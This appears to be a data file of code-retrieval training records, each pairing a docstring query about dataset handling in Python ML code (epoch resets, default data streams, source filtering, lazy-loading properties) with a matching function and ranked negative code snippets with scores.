losses[\"weight_stage3_L2\"] = _eucl_loss\n losses[\"weight_stage4_L1\"] = _eucl_loss\n losses[\"weight_stage4_L2\"] = _eucl_loss\n losses[\"weight_stage5_L1\"] = _eucl_loss\n losses[\"weight_stage5_L2\"] = _eucl_loss\n losses[\"weight_stage6_L1\"] = _eucl_loss\n losses[\"weight_stage6_L2\"] = _eucl_loss\n\n return losses", "def get_loss(self):\n return self.loss / self.cnt", 
"def get_loss_fn(kind):\n if kind == 'classic':\n loss_fn = classic_gan_losses\n elif kind == 'nonsaturating':\n loss_fn = nonsaturating_gan_losses\n elif kind == 'wasserstein':\n loss_fn = wasserstein_gan_losses\n elif kind == 'hinge':\n loss_fn = hinge_gan_losses\n return loss_fn", "def compute_loss(self):", "def get_loss_function(loss):\n if loss is None or isinstance(loss, losses.Loss):\n return loss\n\n if tf_inspect.isclass(loss) and issubclass(loss, losses.Loss):\n # It is not safe to assume that the loss takes no constructor arguments.\n raise ValueError(\n 'Received uninstantiated Loss class: {}\\nPlease call loss \"\"classes '\n 'before passing them to Model.compile.'.format(loss))\n\n # Deserialize loss configuration, if needed.\n if isinstance(loss, collections.abc.Mapping):\n loss = losses.get(loss)\n\n # Custom callable class.\n if callable(loss) and not hasattr(loss, '__name__'):\n return loss\n\n # Wrap loss function with signature `(y_true, y_pred, **kwargs)`\n # in `LossFunctionWrapper` class.\n loss_fn = losses.get(loss)\n\n # For losses which are given as strings/functions in the compile API,\n # we always set the loss reduction type to be `SUM_OVER_BATCH_SIZE`\n # (both in distribution strategy context and otherwise).\n return losses.LossFunctionWrapper(\n loss_fn,\n name=loss_fn.__name__,\n reduction=losses_utils.ReductionV2.SUM_OVER_BATCH_SIZE)", "def compute_loss(self):\n self.prototypes = self.compute_prototypes()\n self.test_logits = self.compute_logits()\n loss = tf.nn.sparse_softmax_cross_entropy_with_logits(\n labels=self.episode.test_labels, logits=self.test_logits)\n cross_entropy_loss = tf.reduce_mean(loss)\n regularization = tf.reduce_sum(\n tf.get_collection(tf.GraphKeys.REGULARIZATION_LOSSES))\n loss = cross_entropy_loss + self.weight_decay * regularization\n return loss", "def check_loss(self, loss):\r\n if loss in loss_functions:\r\n return loss\r\n else:\r\n raise InvalidNeuralNetwork()", "def _get_loss_fn(self):\n msg = (\n \"Abstract class: _get_loss_fn() must be implemented by a child \"\n \"class of Classifier.\"\n )\n raise NotImplementedError(msg)", "def get_loss(name: str):\n if name == 'mse' or name is None:\n loss = nn.MSELoss()\n elif name == 'cp':\n loss = CosineProximityLoss()\n elif name == 'mae':\n loss = nn.L1Loss()\n elif name == 'bce':\n loss = nn.BCEWithLogitsLoss()\n else:\n raise ValueError(f'Loss function {name} not supported.')\n return loss", "def compute_loss(self):\n def calc_loss(inputs, outputs):\n reconstruction_loss = tf.metrics.binary_crossentropy(\n tf_flat(inputs), tf_flat(outputs))\n reconstruction_loss *= OUT_SIZE * OUT_SIZE\n kl_loss = -0.5 * tf.reduce_sum(1.0 + self.log_sigma - tf.square(\n self.mu) - tf.exp(self.log_sigma), 1)\n return tf.reduce_mean(reconstruction_loss + kl_loss)\n return calc_loss", "def ml_loss(self, c1=1.0):\n loss = MLLoss(c1)\n return loss.lossFunction", "def loss(self):\n if not self.run:\n self._run()\n return self.model_loss", "def compute_loss(self, features, mode, params, precomputed):\n raise NotImplementedError(\"Model does not implement loss.\")", "def get_loss_fn(num_classes):\n def classification_loss_fn(labels, logits):\n \"\"\"Classification loss.\"\"\"\n labels = tf.squeeze(labels)\n log_probs = tf.nn.log_softmax(logits, axis=-1)\n one_hot_labels = tf.one_hot(tf.cast(labels, dtype=tf.int32), depth=num_classes, dtype=tf.float32)\n per_example_loss = -tf.reduce_sum(tf.cast(one_hot_labels, dtype=tf.float32) * log_probs, axis=-1)\n return tf.reduce_mean(per_example_loss)\n return 
classification_loss_fn" ]
[ "0.7495766", "0.7134641", "0.70509577", "0.7038898", "0.6990812", "0.6928303", "0.6885967", "0.68388313", "0.6784255", "0.6783532", "0.67699516", "0.6748856", "0.672302", "0.66822994", "0.66506594", "0.6647998", "0.6568442", "0.6567009", "0.65539795", "0.65407044", "0.6529401", "0.6500925", "0.64968306", "0.6443255", "0.6425503", "0.64233994", "0.64153904", "0.63983357", "0.6352483", "0.63523537" ]
0.77475625
0
Switches the dataset state to the next epoch. The default implementation for this method is to reset the state. Returns the new state.
def next_epoch(self, state): return self.reset(state)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def new_epoch(self):\n self._curr_batch = 0\n if self.shuffle_order:\n self.shuffle()", "def _reset(self):\n np.random.shuffle(self.id)\n self.episode_step = 0 # Reset episode step counter at the end of every episode\n self._state = self.X_train[self.id[self.episode_step]]\n self._episode_ended = False\n\n return ts.restart(self._state)", "def reset_epoch(self):\n self.ix = 0", "def __new_epoch(self):\n self.epoch += 1\n indices = np.arange(self.data.shape[0])\n np.random.shuffle(indices)\n self.q = list(indices)", "def reset(self):\n # Initialize the timestep\n self.timestep = 0\n self.state = self.starting_state\n\n if self.from_data:\n self.episode_num += 1\n\n\n return self.starting_state", "def new_epoch(self):\n temp = list(zip(self.images_names, self.labels_names))\n random.shuffle(temp)\n self.images_names, self.labels_names = zip(*temp)\n self.pos = 0\n self.CL.reset(self.images_names, self.labels_names)", "def _epoch_before_hook(self):\n self._train_steps_this_epoch = 0", "def train_one_epoch(self):\n raise NotImplementedError", "def on_epoch_end(self):\n if self.shuffle:\n self.dataset_df = skl_shuffle(self.dataset_df)", "def set_train_epoch(self, epoch: int):\n if hasattr(self, 'cls_head'):\n self.cls_head.set_train_epoch(epoch)", "def on_epoch_start(self):\n self.current_epoch += 1\n self.current_lr = self.fn(self.current_epoch)\n self.model.set_learning_rate(self.current_lr)\n self.epochs += [self.current_epoch]\n self.learning_rate += [self.current_lr]", "def cur_epoch(self, epoch: int):\n # allow setter for training resumption\n self._cur_epoch = epoch", "def reset(self, batch_size=None, is_new_epoch=False):\n if is_new_epoch:\n self.epoch += 1\n\n self.batch_sampler.reset(batch_size, epoch=self.epoch)", "def changeEpochs(self,epochs):\n self.epochs = epochs", "def set_epoch(self, epoch):\r\n pass", "def reset(self):\n self.epochs = 0\n # Shuffle the training data\n perm = np.arange(self.num_train)\n np.random.shuffle(perm)\n assert self.num_train == self.train_images.shape[\n 0], 'Error incorrect shuffling mask'\n self.train_images = self.train_images[perm]\n self.train_labels = self.train_labels[perm]\n self.curr_train_index = 0", "def set_train_epoch(self, epoch: int):\n self._train_epoch = epoch", "def before_training_epoch(self, epoch, **kw):\n self.current_row = {MetricName(\"epoch\"): epoch}", "def set_epoch(self, epoch):\n self.epoch = epoch", "def step(self, epoch):\n\n self.train(epoch)\n self.test(epoch)", "def before_train_epoch(self, runner):\n recipe = self.schedule.get(runner.epoch + 1, None)\n if recipe is not None:\n self._do_switch(runner, recipe, f' at epoch {runner.epoch + 1}')", "def update_train_state(self):\n\n # Save one model at least\n if self.train_state['epoch_index'] == 0:\n # torch.save(self.classifier.state_dict(), self.train_state['model_filename'])\n self.save_model()\n self.train_state['stop_early'] = False\n\n # Save model if performance improved\n elif self.train_state['epoch_index'] >= 1:\n loss_tm1, loss_t = self.train_state['val_loss'][-2:]\n\n # If loss worsened\n if loss_t >= self.train_state['early_stopping_best_val']:\n # Update step\n self.train_state['early_stopping_step'] += 1\n # Loss decreased\n else:\n # Save the best model\n if loss_t < self.train_state['early_stopping_best_val']:\n self.save_model()\n self.train_state['early_stopping_best_val'] = loss_t\n\n # Reset early stopping step\n self.train_state['early_stopping_step'] = 0\n\n # Stop early ?\n self.train_state['stop_early'] = \\\n 
self.train_state['early_stopping_step'] >= self.args.early_stopping_criteria", "def step_begin_epoch(self, epoch):\n self.lr = self.get_next_lr(epoch)\n self.optimizer.set_lr(self.warmup_factor * self.lr)\n return self.optimizer.get_lr()", "def train_epoch(self):\r\n for loader in self.loaders:\r\n if self.epoch % loader.epoch_interval == 0:\r\n self.cycle_dataset(loader)\r\n\r\n self._stats_new_epoch()\r\n self._write_tensorboard()\r\n print('{}th epoch train / eval done!'.format(self.epoch))", "def epoch_start(self, epoch):\n self.epoch = epoch", "def train_epoch(self):\n for batch, targets in self.training_dataloader:\n self.training_step(batch, targets)\n self.calculate_training_loss()\n self.epochs_trained += 1\n LOGGER.info(\n \"Training loss after {} epochs: {}\".format(str(self.epochs_trained), str(self.training_average_loss))\n )", "def _set_current_step(self, epoch: int):\n self._cur_step = epoch * self._steps_per_epoch", "def reset_epoch_cache(self):\n self.epoch_cache = {\"train\":PerformanceBatch(), \n \"val\":PerformanceBatch(), \n \"test\":PerformanceBatch()}", "def _train_epoch(self, epoch):\n raise NotImplementedError", "def _train_epoch(self, epoch):\n raise NotImplementedError" ]
[ "0.73462296", "0.69393736", "0.6755204", "0.6629461", "0.6506496", "0.646609", "0.6465896", "0.6438578", "0.6374113", "0.6371389", "0.6335564", "0.63048464", "0.628498", "0.6273848", "0.62642074", "0.6264049", "0.6257736", "0.6157545", "0.6111303", "0.60934657", "0.6084503", "0.6049696", "0.60476315", "0.6043031", "0.6039409", "0.60383385", "0.6033077", "0.5998931", "0.59951043", "0.59951043" ]
0.7705791
0
Use the default iteration scheme to construct a data stream.
def get_default_stream(self):
    if not hasattr(self, 'default_scheme'):
        raise ValueError("Dataset does not provide a default iterator")
    return DataStream(self, iteration_scheme=self.default_scheme)
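A minimal usage sketch of the stream this returns, assuming a Fuel-style dataset whose default_scheme is set; the dataset class and the process callback below are hypothetical, not part of the original snippet:

dataset = MNIST('train')              # hypothetical dataset with a default scheme
stream = dataset.get_default_stream()
for batch in stream.get_epoch_iterator():
    process(batch)                    # placeholder for real per-batch work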
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def make_data_iterator(input):\n assert isinstance(input, DataLoader)\n data_iterator = iter(input)\n return data_iterator", "def __iter__(self):\n\n # Open the data reader\n self.data.open()\n\n starts = np.arange(self.start, self.stop, self.chunksize)\n for a, b in zip_longest(starts, starts[1:], fillvalue=self.stop):\n yield self.data.read(a, b, **self.kwargs)", "def __iter__(self):\n for sample in self.data:\n yield sample", "def one_shot_iterator(dataloader):\n while True:\n for data in dataloader:\n yield data", "def __iter__(self):\n for i in range(len(self.data)):\n yield self.data[i]", "def __iter__(self):\n return self.stream_chunker", "def cohere_stream(stream):\n if isinstance(stream, IterIO):\n return stream\n return IterIO(stream)", "def __iter__(self):\n return iter(self.data)", "def __iter__(self):\n return iter(self.data)", "def __iter__(self):\n return iter(self.data)", "def __iter__(self):\r\n return iter(self.data)", "def __init__(self, iterable_creator, size=None):\n super(IterStream, self).__init__()\n self.iterable_creator = iterable_creator\n self.size = size\n # logging.debug('IterStream.size is {0}'.format(self.size))\n self.reset()", "def data_next(self, *args, **kwargs):\n # there is this nasty tradeoff where if you implement this in this way\n # where data can take arguments, then _any_ downstream artifact that you\n # want also has to take those arguments as well, clearly undesireable\n # in cases where you would like to be able to do the transformation\n # without having to haul a bunch of stuff around with you\n # what this means is that either you have to accept a set of defaults that\n # are sane and will get you what you want, you identifier is incomplete and\n # thus you add arguments to your function to flesh it out, or\n # you have to drop down a level, configure your argument ahead of time\n # and then make the request again with slightly differen types\n\n # allowing the underlying abstraction to bubble up into optional kwarsg\n # frankly seems like a pretty good option, if it werent for the fact that\n # it is an absolute pain to maintain in the absense of mimicArgs\n # I feel like cl generics could make this much easier ...\n\n # OR OR OR the graph is successor stream of the actual instantiation of this stream\n # which means that ... the extra args would go in at init time??? no\n # that doesn't seem like the right tradeoff, any successor streams\n # basically have to present kwargs for any variables that cannot be\n # set to a sane default within the scope of the identifier system (sigh)\n # or at least in cases where it hasn't been demostrated that the variables\n # are simply a matter of representaiton, not differences in information\n # (i.e. that there isn't a function that can 1:1 interconvert)\n\n generator = self.metadata().data_next(yield_response_gen=True, **kwargs)\n format, *header_chunks, (resp, gen) = generator\n self.headers = resp.headers\n self.format = format\n # TODO populate header graph? 
not sure this is actually possible\n # maybe need to double wrap so that the header chunks always get\n # consumbed by the header object ?\n if self.format == 'application/rdf+xml':\n resp.close()\n return None\n\n return chain(header_chunks, gen)", "def data_generator(f):\n def g(*a, **kw):\n return data_iter(f(*a, **kw))\n return g", "def __iter__(self):\n\t\tfor i, data in enumerate(self.dataloader):\n\t\t\tif i * self.opt.batch_size >= self.opt.max_dataset_size:\n\t\t\t\tbreak\n\t\t\tyield data", "def __iter__(self):\n for i, data in enumerate(self.dataloader):\n if i * self.opt.batch_size >= self.opt.max_dataset_size:\n break\n yield data", "def __iter__(self) -> Union[Iterator[int], Iterator[Tuple[int, Any]]]:\n self.size = self._data._dataset_size\n if (not self._data._fully_cached or\n self._data._should_call_prefetch_source):\n self._data._start_iteration()\n # First epoch of lazy loading, calling prefetch, and returning\n # indices and examples.\n iterator = self._iterator_unknown_size()\n else:\n # Non-lazy loading, or when dataset has been fully iterated.\n assert self.size is not None\n iterator = self._iterator_given_size(self.size)\n\n if self._data._should_call_prefetch_processed:\n # Processing routine is performed in main process. Yield\n # processed examples instead.\n map_fn = lambda idx: (idx, self._data._processed_cache[idx])\n elif self._data._should_yield_raw_example:\n # Return indices and examples for any epoch in this case.\n map_fn = lambda idx: (idx, self._data._source[idx])\n else:\n map_fn = None # type: ignore\n if map_fn is not None:\n return map(map_fn, iterator)\n\n return iterator", "def _make_dataset_iterator(self, dataset):\n # Note that split_batch_by argument is not passed because it is always 1 in\n # this strategy, and adding it adds unnecessary overhead to the dataset.\n return input_lib_v1.DatasetIterator(dataset, self._input_workers,\n self._container_strategy())", "def on_iterate(self, data: Any = None):\n raise NotImplementedError", "def __iter__(self):\n for data in self._iterable_data:\n yield self.transform(data)", "def data_stream(self, x=[], y=[]):\n xy = np.zeros((self.numpoints,2))\n i = 0\n while True:\n xy[i,0]=x[i];xy[i,1]=y[i]\n i = (i+1) % self.numpoints\n yield np.c_[xy[:,0], xy[:,1]]", "def __iter__(self):\n for item in self._reader:\n yield item", "def __iter__(self):\n for datum in self.data[self.name]:\n yield datum", "def __iter__(self):\n return self.new_generator()", "def stream(self, **stream_options):\n return stream_generator(self.new, **stream_options)", "def init_iterable(self, inp):\n inp = make_iter(inp)\n nsize = len(inp)\n self._npages = nsize // self.height + (0 if nsize % self.height == 0 else 1)\n self._data = inp", "def __init__(self, iterator):\n self.iterator = []\n while iterator.hasNext():\n self.iterator.append(iterator.next())", "def __iter__(self):\n with self.handler as handler:\n if self.shuffle:\n # load all samples into memory\n samples = []\n while True:\n sample = handler.read()\n if sample is None:\n break\n sample = self.transform(sample)\n samples.append(sample)\n random.shuffle(samples)\n for sample in samples:\n yield sample\n else:\n # lazy-loading mode\n while True:\n sample = handler.read()\n if sample is None:\n break\n sample = self.transform(sample)\n yield sample", "def __init__(self, iterator):\n super().__init__(iterator,\n join=lambda x: x, empty=lambda x: [],\n init=lambda content, index: content)", "def __iter__(self) -> Iterator:\n return iter(self.get_data_loader())" ]
[ "0.6576385", "0.6544374", "0.63232946", "0.6247353", "0.6233099", "0.62073475", "0.618729", "0.61413085", "0.61413085", "0.61413085", "0.61316687", "0.60305387", "0.6023972", "0.6003705", "0.5974357", "0.5966117", "0.5944801", "0.594095", "0.5936904", "0.59299433", "0.59298265", "0.59144247", "0.59139335", "0.59042704", "0.5890689", "0.58767956", "0.58674407", "0.58559704", "0.5846868", "0.58427656" ]
0.6743139
0
Filter the requested sources from those provided by the dataset. A dataset can be asked to provide only a subset of the sources it can provide (e.g. asking MNIST only for the features, not for the labels). A dataset can choose to use this information to e.g. only load the requested sources into memory. However, in case the performance gain of doing so would be negligible, the dataset can load all the data sources and then use this method to return only those requested.
def filter_sources(self, data):
    return tuple([d for d, s in zip(data, self.provides_sources)
                  if s in self.sources])
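A worked toy example of the same zip-based filtering in isolation; the source names and data values are made up for illustration:

provides_sources = ('features', 'targets')
sources = ('features',)
data = ('X', 'y')
result = tuple(d for d, s in zip(data, provides_sources) if s in sources)
# result == ('X',): only the requested source survives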
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def get_new_sourcedatasets(self):\n previous_study_version = self.get_previous_version()\n SourceDataset = apps.get_model('trait_browser', 'SourceDataset')\n if previous_study_version is not None:\n qs = SourceDataset.objects.filter(source_study_version=self)\n # We can probably write this with a join to be more efficient.\n previous_dataset_accessions = SourceDataset.objects.filter(\n source_study_version=previous_study_version\n ).values_list('i_accession', flat=True)\n qs = qs.exclude(i_accession__in=previous_dataset_accessions)\n return qs\n else:\n return SourceDataset.objects.none()", "def getSourceSubset(self, selection=None):\n if not selection or selection.lower() == \"all\":\n return self.sources\n # sort by brightness\n from past.builtins import cmp\n from functools import cmp_to_key\n srclist0 = sorted(self.sources, key=cmp_to_key(lambda a, b: cmp(b.brightness(), a.brightness())))\n all = set([src.name for src in srclist0])\n srcs = set()\n for ispec, spec in enumerate(re.split(\"\\s+|,\", selection)):\n spec = spec.strip()\n if spec:\n # if first spec is a negation, then implictly select all sources first\n if not ispec and spec[0] in \"!-\":\n srcs = all\n if spec.lower() == \"all\":\n srcs = all\n elif self._re_bynumber.match(spec):\n negate, start, end = self._re_bynumber.match(spec).groups()\n sl = slice(int(start) if start else None, int(end) if end else None)\n if negate:\n srcs.difference_update([src.name for src in srclist0[sl]])\n else:\n srcs.update([src.name for src in srclist0[sl]])\n elif spec.startswith(\"-=\") or spec.startswith(\"!=\"):\n srcs.difference_update([src.name for src in srclist0 if getattr(src, spec[2:], None)])\n elif spec.startswith(\"=\"):\n srcs.update([src.name for src in srclist0 if getattr(src, spec[1:], None)])\n elif spec.startswith(\"-\") or spec.startswith(\"!\"):\n srcs.discard(spec[1:])\n else:\n srcs.add(spec)\n # make list\n return [src for src in srclist0 if src.name in srcs]", "def get_diffuse_sources(self, src_sel):\n extended = self._select_and_freeze(self.extended_sources, src_sel)\n for s in extended: # this seems redundant, but was necessary\n s.model.free[:] = False if src_sel.frozen(s) else s.free[:]\n sources.validate(s,self.nside, None)\n s.smodel = s.model\n \n return self.get_global_sources(src_sel.skydir()), extended", "def get_data_sources(self) -> [DataSource]:\n return []", "def findsources(self, *args, **kwargs):\n return _image.image_findsources(self, *args, **kwargs)", "def filter_dataset(source_path, dataset_path, progress_bar, info_label, progress, root):\n # dictionary to store two source path\n source_path_name = {}\n for d in SUB_DIRS:\n source_path_name[f\"{d}\"] = os.path.join(source_path, d)\n\n if not os.path.exists(source_path + \"/\" + SUB_DIRS[0]) and not os.path.exists(source_path + \"/\" + SUB_DIRS[1]):\n messagebox.showerror(\"Message\", \"Please check whether source directory, \\n \\\n must contain 'attentive' and 'not_attentive' dataset\")\n else:\n attentive = set()\n not_attentive = set()\n\n total_img = len(os.listdir(source_path + \"/\" + SUB_DIRS[0])) + len(os.listdir(source_path + \"/\" + SUB_DIRS[1]))\n i = 0\n\n # for attentive images in format particular format and availability of face\n for image in os.listdir(source_path + \"/\" + SUB_DIRS[0]):\n if len(image.split(\".\")) == 2 and image.split(\".\")[1] in IMG_FORMAT \\\n and check_availability(source_path + \"/\" + SUB_DIRS[0] + \"/\" + image):\n attentive.add(image)\n i += 1\n progress_bar['value'] = int((i / total_img) * 100)\n 
progress.update()\n\n info_label['text'] = 'Not Attentive set filtering is on progress'\n\n # for not attentive images\n for image in os.listdir(source_path + \"/\" + SUB_DIRS[1]):\n if len(image.split(\".\")) == 2 and image.split(\".\")[1] in IMG_FORMAT \\\n and check_availability(source_path + \"/\" + SUB_DIRS[1] + \"/\" + image):\n not_attentive.add(image)\n i += 1\n progress_bar['value'] = int((i / total_img) * 100)\n progress.update()\n\n info_label['text'] = 'Filtering is completed'\n progress.destroy()\n\n attentive, not_attentive = list(attentive), list(not_attentive)\n\n if len(attentive) > 200 and len(not_attentive) > 200:\n next_page_interface(source_path_name, dataset_path, attentive, not_attentive, root)\n else:\n messagebox.showerror(\"Message\", \"Valid Image Count Is Less Than 100\")", "def get_data_sources(self):\n d = {}\n for k, connector in self.target_model.datasets().items():\n\n if not connector.uses_dataset_discovery:\n continue\n\n# can foxglove eval on demand or is this needed?\n# # force dataset to load, this will ensure dataset discovery has evaluated\n# # connection parameters.\n# assert connection.data\n d[k] = connector.engine_params\n return d", "def find_sources(data_dir, mode='training', shuffle=True):\n raise NotImplementedError", "def get_point_sources(self, src_sel):\n return self._select_and_freeze(self.point_sources, src_sel)", "def _source_filter(self):\n param_id = self._detect_source_params()\n cls_str = self._detect_source_param_class(param_id)\n if cls_str is None:\n raise ProfileError(\"parameter '%s' isn't defined in config\" %\n param_id)\n else:\n self.logger.debug(\"==> source objects class is '%s'\" % cls_str)\n cls = globals()[cls_str]\n instance = cls(param_id, \"$\", self.config[\"source\"][\"objects\"])\n return instance.get_pattern()", "def source_list(self):\n return [\n source.Name for source in self.coordinator.data.sources if not source.Hidden\n ]", "def query_initial_sources(self):\n self.search_thread_pool.waitForDone(0)\n # self.init_vector_layers()\n username, password, api_key, max_items_to_return = SettingsOps.get_settings()\n errors = []\n SettingsOps.validate_stored_info(username, password, api_key, max_items_to_return, errors)\n if len(errors) == 0:\n source_runnable = SourceRunnable(username, password, api_key, DEFAULT_ORDER_PARAMS)\n source_runnable.source_object.task_complete.connect(self.on_new_source)\n self.init_progress_bar()\n self.search_thread_pool.start(source_runnable)", "def get_sources(self, sources=None):\n\n if sources is None:\n with open(self.path, 'r') as infile:\n keys = list(json.loads(next(infile)).keys())\n sources = [\n k for k in keys\n ] + [\n 'raw_' + k for k in keys\n ] + [\n k + '_length' for k in keys\n ]\n\n elif not isinstance(sources, (list, tuple)):\n sources = [sources]\n\n for source in sources:\n if source not in self.sources:\n raise KeyError(\n 'Invalid data key: {}. 
Valid keys are: {}'.format(\n source, ', '.join(str(k) for k in self.sources.keys())\n ))\n\n return {k : self.sources[k] for k in sources}", "def select_sources(cat_table, cuts):\n nsrc = len(cat_table)\n full_mask = np.ones((nsrc), bool)\n for cut in cuts:\n if cut == 'mask_extended':\n full_mask *= mask_extended(cat_table)\n elif cut == 'select_extended':\n full_mask *= select_extended(cat_table)\n else:\n full_mask *= make_mask(cat_table, cut)\n\n lout = [src_name.strip() for src_name in cat_table['Source_Name'][full_mask]]\n return lout", "def _load_sources(self):\n ss_dir = SteelScriptDir('AppResponse', 'files')\n\n for svc in [PACKETS_REPORT_SERVICE_NAME,\n GENERAL_REPORT_SERVICE_NAME]:\n svc_version = self.appresponse.versions[svc]\n sw_version = (self.appresponse.get_info()['sw_version']\n .replace(' ', ''))\n sources_filename = ('{}-sources-{}-{}.pcl'\n .format(svc, svc_version, sw_version))\n sources_file = ss_dir.get_data(sources_filename)\n\n sources_file.read()\n\n if not sources_file.data:\n svcdef = self.appresponse.find_service(svc)\n\n # sources is a list of dictionaries\n sources = svcdef.bind('sources').execute('get').data['items']\n\n # the whole set of sources for current service\n all_sources = {}\n\n for source in sources:\n cols = source['columns']\n source['columns'] = \\\n OrderedDict(sorted(zip(map(lambda x: x['id'], cols),\n cols)))\n source['filters_on_metrics'] = \\\n source['capabilities']['filters_on_metrics']\n if 'granularities' not in source:\n source['granularities'] = None\n\n all_sources[source['name']] = source\n\n if source['name'] in report_source_to_groups:\n self._sources[source['name']] = source\n\n # source_file writes the whole set of sources to disk\n sources_file.data = all_sources\n sources_file.write()\n logger.debug(\"Wrote sources data into {}\"\n .format(sources_filename))\n else:\n logger.debug(\"Loading sources data from {}\"\n .format(sources_filename))\n # Only load valid sources based on settings\n for k, v in sources_file.data.iteritems():\n if k in report_source_to_groups:\n self._sources[k] = v\n\n return", "def filter(self, filters):", "def filter_dsets_with_restrictions(datasets, restrictions):\n # collect the masks of the existing restrictions\n list_of_masks = [restriction.get_mask() for restriction in restrictions if restriction is not None]\n\n # create one mask from all the masks\n filtering_mask = logical_and_on_list_of_masks(list_of_masks)\n\n # apply the final mask to all the datasets in the dictonary\n if filtering_mask is not None:\n return utils.filter_dictionary_by_mask(datasets, filtering_mask)\n\n return datasets", "def test_returns_all_datasets_with_no_query(self):\n url = self.get_url(self.study.pk)\n response = self.client.get(url)\n pks = get_autocomplete_view_ids(response)\n self.assertEqual(sorted([dataset.pk for dataset in self.source_datasets]), sorted(pks))", "def test_returns_all_datasets_with_no_query(self):\n url = self.get_url(self.study.pk)\n response = self.client.get(url)\n pks = get_autocomplete_view_ids(response)\n self.assertEqual(sorted([dataset.pk for dataset in self.source_datasets]), sorted(pks))", "def test_returns_all_datasets_with_no_query(self):\n url = self.get_url(self.study.pk)\n response = self.client.get(url)\n pks = get_autocomplete_view_ids(response)\n self.assertEqual(sorted([dataset.pk for dataset in self.source_datasets]), sorted(pks))", "def get_sources(**kwargs):\n\n instance = Ceic._get_instance()\n\n get_dictionaries_method = instance._dictionary_facade.get_sources\n 
result = instance._make_request(get_dictionaries_method, **kwargs)\n\n return result", "def _load_filter(self, *args, **kwargs):\n raise NotImplementedError", "def test_returns_all_datasets_with_no_query(self):\n url = self.get_url()\n response = self.client.get(url)\n pks = get_autocomplete_view_ids(response)\n self.assertEqual(sorted([dataset.pk for dataset in self.source_datasets]), sorted(pks))", "def test_returns_all_datasets_with_no_query(self):\n url = self.get_url()\n response = self.client.get(url)\n pks = get_autocomplete_view_ids(response)\n self.assertEqual(sorted([dataset.pk for dataset in self.source_datasets]), sorted(pks))", "def test_returns_all_datasets_with_no_query(self):\n url = self.get_url()\n response = self.client.get(url)\n pks = get_autocomplete_view_ids(response)\n self.assertEqual(sorted([dataset.pk for dataset in self.source_datasets]), sorted(pks))", "def _exhaust_sources(self):\n return self._exhaust_sinks(False)", "def fetch_data(self, begin=None, end=None, delete_rawdata=None):\n\n if delete_rawdata is None:\n delete_rawdata = self.delete_rawdata\n\n for source in self.sources.keys():\n if source in self.staticsources:\n continue\n src = self.sources[source]\n print '[INFO] Download data for source ' + source\n src.download_and_resample(begin=begin, end=end,\n shapefile=self.shapefile,\n delete_rawdata=delete_rawdata)\n\n print '[SUCCESS] Download and resampling complete!'", "async def _async_build_source_set(self) -> set[IPv4Address]:\n adapters = await network.async_get_adapters(self._hass)\n sources: set[IPv4Address] = set()\n if network.async_only_default_interface_enabled(adapters):\n sources.add(IPv4Address(\"0.0.0.0\"))\n return sources\n\n return {\n source_ip\n for source_ip in await network.async_get_enabled_source_ips(self._hass)\n if not source_ip.is_loopback and not isinstance(source_ip, IPv6Address)\n }", "def get_data_source_by_user(self, username: str = None, id: int = None):\n all_data_sources_from_user_array = []\n user = None\n try:\n try:\n if username is not None:\n user = dict_to_model(\n User, UserService.get_user_by_username(self, username))\n elif id is not None:\n user = dict_to_model(User,\n UserService.get_user_by_id(self, id))\n except Exception:\n raise\n\n if user is not None:\n for data_source in DataSource.select(\n DataSource, user).where(DataSource.user == user):\n all_data_sources_from_user_array.append(\n model_to_dict(data_source))\n return all_data_sources_from_user_array\n except Exception:\n raise", "def query_sources(self, search_params):\n self.search_thread_pool.waitForDone(0)\n # self.init_vector_layers()\n # clear out old models\n self.dialog_base.data_sources_list_view.setModel(None)\n self.dialog_base.geometry_list_view.setModel(None)\n self.dialog_base.types_list_view.setModel(None)\n self.sources.clear()\n self.geometries.clear()\n self.types_dict.clear()\n self.items.clear()\n self.written_first_line = False\n self.written_first_point = False\n self.written_first_polygon = False\n\n username, password, api_key, max_items_to_return = SettingsOps.get_settings()\n if VectorsProcessForm.validate_stored_settings(self.iface, username, password, api_key, max_items_to_return):\n source_runnable = SourceRunnable(username, password, api_key, search_params)\n source_runnable.source_object.task_complete.connect(self.on_new_source)\n self.init_progress_bar()\n self.search_thread_pool.start(source_runnable)" ]
[ "0.6109405", "0.6090112", "0.59479564", "0.58847076", "0.5806422", "0.56509817", "0.5643852", "0.5635574", "0.5618711", "0.5561764", "0.55469316", "0.5468559", "0.5457959", "0.54406905", "0.5426888", "0.53734815", "0.53640324", "0.5352967", "0.5352967", "0.5352967", "0.5322468", "0.5303992", "0.53022915", "0.53022915", "0.53022915", "0.52907467", "0.52845645", "0.52761704", "0.5262737", "0.52453995" ]
0.69611335
0
Create properties that perform lazy loading of attributes.
def lazy_property_factory(lazy_property):
    def lazy_property_getter(self):
        if not hasattr(self, '_' + lazy_property):
            self.load()
        if not hasattr(self, '_' + lazy_property):
            raise ValueError("{} wasn't loaded".format(lazy_property))
        return getattr(self, '_' + lazy_property)

    def lazy_property_setter(self, value):
        setattr(self, '_' + lazy_property, value)

    return lazy_property_getter, lazy_property_setter
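A sketch of how the returned getter/setter pair might be attached to a class as a property; the class and attribute names here are assumptions, not part of the original API:

class SomeDataset(InMemoryDataset):   # assumed base class with a load() method
    pass

SomeDataset.features = property(*lazy_property_factory('features'))
# Reading instance.features now calls instance.load() on first access,
# then returns the cached instance._features.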
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def lazy_properties(*lazy_properties):\n def lazy_property_factory(lazy_property):\n \"\"\"Create properties that perform lazy loading of attributes.\"\"\"\n def lazy_property_getter(self):\n if not hasattr(self, '_' + lazy_property):\n self.load()\n if not hasattr(self, '_' + lazy_property):\n raise ValueError(\"{} wasn't loaded\".format(lazy_property))\n return getattr(self, '_' + lazy_property)\n\n def lazy_property_setter(self, value):\n setattr(self, '_' + lazy_property, value)\n\n return lazy_property_getter, lazy_property_setter\n\n def wrap_dataset(dataset):\n if not issubclass(dataset, InMemoryDataset):\n raise ValueError(\"Only InMemoryDataset supports lazy loading\")\n\n # Attach the lazy loading properties to the class\n for lazy_property in lazy_properties:\n setattr(dataset, lazy_property,\n property(*lazy_property_factory(lazy_property)))\n\n # Delete the values of lazy properties when serializing\n if not hasattr(dataset, '__getstate__'):\n def __getstate__(self):\n serializable_state = self.__dict__.copy()\n for lazy_property in lazy_properties:\n attr = serializable_state.get('_' + lazy_property)\n # 